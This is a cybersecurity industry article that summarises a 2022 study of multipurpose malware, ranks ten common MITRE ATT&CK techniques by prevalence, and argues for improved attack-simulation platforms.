Multipurpose malicious software attacks are surging. They are referred to as the “Swiss Army knife” for cybercriminals, as they are capable of undertaking different attack strategies to avoid detection and maximize the impact of an attack.
A recent study that analyzed more than half a million unique malicious files in 2022 shows that cybercriminals have become more adept at developing sophisticated malware. These anomalous files were identified based on data from various threat intelligence sources, including open-source threat information providers, security researchers, and malware sandboxes. They demonstrate augmented capabilities that allow them to confuse and circumvent the conventional ways security controls work.
Detection through threat intelligence alone is clearly no longer enough. However, even behavior or pattern-analyzing methods also seem to be having difficulties in addressing new threats. There is a need for better detection and prevention, especially when it comes to cyber attack simulations.
Evolving security solutions and threats
Attack simulation is one of the best tools against modern cyber threats. It combines various strategies to determine the effectiveness of an existing cybersecurity system. It also provides insights on how to address the cybersecurity defects or weaknesses discovered after the simulation. However, cybersecurity is not the only one evolving. Threat actors are also ceaselessly looking for ways to defeat the advantages provided by simulation.
As such, there is a need for improved cyber attack simulations. Simulations should effectively validate security controls or provide ample insights if the controls appear to be ineffective. They should ensure excellent threat exposure and external attack surface management. They have to be capable of assessing, optimizing, and rationalizing security posture comprehensively and in line with the latest threat intelligence.
Threat actors are developing malicious software that does more than what most cybersecurity systems are designed to spot and block. “The fact that more malware can conduct lateral movement is a sign that adversaries of all types are being forced to adapt to differences in IT environments and work harder to get their payday,” notes Suleyman Ozarslan, one of the point persons for the malware study mentioned earlier.
The complex threats posed by multipurpose malware
The malware study’s analysis reveals that around 10 percent of the malware identified matched more than 30 of the tactics, techniques, and procedures (TTP) described in the MITRE ATT&CK framework. Meanwhile, around a third of the examined malware matched 20 TTPs, while the overall average is 11.
The malware study listed the top 10 most common TTPs associated with the malicious files evaluated. Leading the list is the use of a command and scripting interpreter, which was observed in 31 percent of the samples. This is a script execution technique that enables the execution of arbitrary scripts, binaries, or commands to achieve various goals including the disabling of security controls and downloading of payloads.
The second most common TTP is credential dumping. This was found in a quarter of the malware samples. This data theft method makes it possible for threat actors to dump credentials from operating systems and apps to get usernames, passwords, and other details that allow login to accounts and resources.
Third on the list with a 23 percent incidence rate is data encryption for impact. This is not ransomware encryption, but the encryption of files without financial motivation or attempts to extort the victim. Its sole purpose is to encumber or disrupt the operations of the organization being attacked.
The next most common TTP is the injection of malicious code into legitimate processes. Found in 22 percent of the samples studied, this technique exploits vulnerabilities to gain access and escalate privileges. It allows malware to be executed in the context of target legitimate processes, thereby eluding security control detection.
With a 20 percent prevalence rate, the fifth item on the list is system information discovery. This is the collection of data about a device or network. This unauthorized data collection facilitates the undertaking of lateral movement attacks.
Next is the exploitation of remote services, which is found in 18 percent of the scrutinized malware. It is largely aimed at the Windows Remote Desktop Protocol (RDP) but it also attacks other similar functions such as Secure Shell (SSH), Server Message Block (SMB), Virtual Network Computing (VNC), and Windows Remote Management. This dangerous technique enables the takeover of a device and lateral movement attacks.
The seventh most common TTP in multipurpose malware with a 15 percent prevalence is the abusive use of Windows Management Instrumentation (WMI), the core infrastructure for data management and operations in Windows OSes. Threat actors compromise a server and exploit WMI, which can grant local and remote access to execute malicious payloads and scripts.
Another common TTP is the use of the scheduled task/job feature in many systems. This was discovered in 12 percent of the samples. Crafty cybercriminals can set scheduled tasks that may not be detected by security controls especially if the scheduled tasks are set by persons of authority in an organization. The malicious scheduled tasks can facilitate remote code execution, the persistence of certain malicious processes, and privilege escalation.
Virtualization and sandbox evasion is another widely used TTP, found in 10 percent of the samples. Malware creators apparently try to avoid security detection by adding in their malicious software the ability to detect sandboxes or virtualized environments. The malware “aborts mission” if it is executed under virtualization or sandboxing.
The tenth most common adversarial tactic is remote system discovery, which is associated with 8 percent of the malware examined. This does not have a direct impact on an affected system, but it gathers information that helps cyber criminals find vulnerabilities, insecure remote hosts, and networks in particular.
These are just ten of the many tactics, techniques, and procedures advanced malware can perform nowadays. Sophisticated threat actors or cybercrime groups use these to minimize the possibility of their attack getting detected while making the most of the vulnerabilities they discover. Cybercriminals used to launch multiple separate attacks to find security weaknesses, confuse or disable security controls, and perform lateral movement attacks.. Now, the attacks are packaged in sophisticated malware to achieve various goals and help reduce the efficacy of modern cybersecurity systems.
The need for better attack simulation
The researchers behind the malware study above suggest that high-profile cybercriminals with vast resources are responsible for the rise of this multipurpose malware. They are trying to develop ways to beat modern behavior-based cyber threat detection measures.
The logical way for cybersecurity teams to respond is to improve their systems by leveraging up-to-date threat intelligence and security frameworks to make sure that they detect threats before the attacks manage to contaminate systems. Regular security control updating is a must. Also, threat resolution priorities need to be kept in line with the most recent cybersecurity trends and research findings.
Such improvements may only be properly evaluated through enhanced cyber attack simulations. That’s why it is advisable for organizations to make sure that the simulation platform or method they are using is reliable. The platform should be continuously updated with the most recent information on attack strategies and backed by established security frameworks. Also, it needs a high degree of customization and scalability to match the specific needs of an organization.
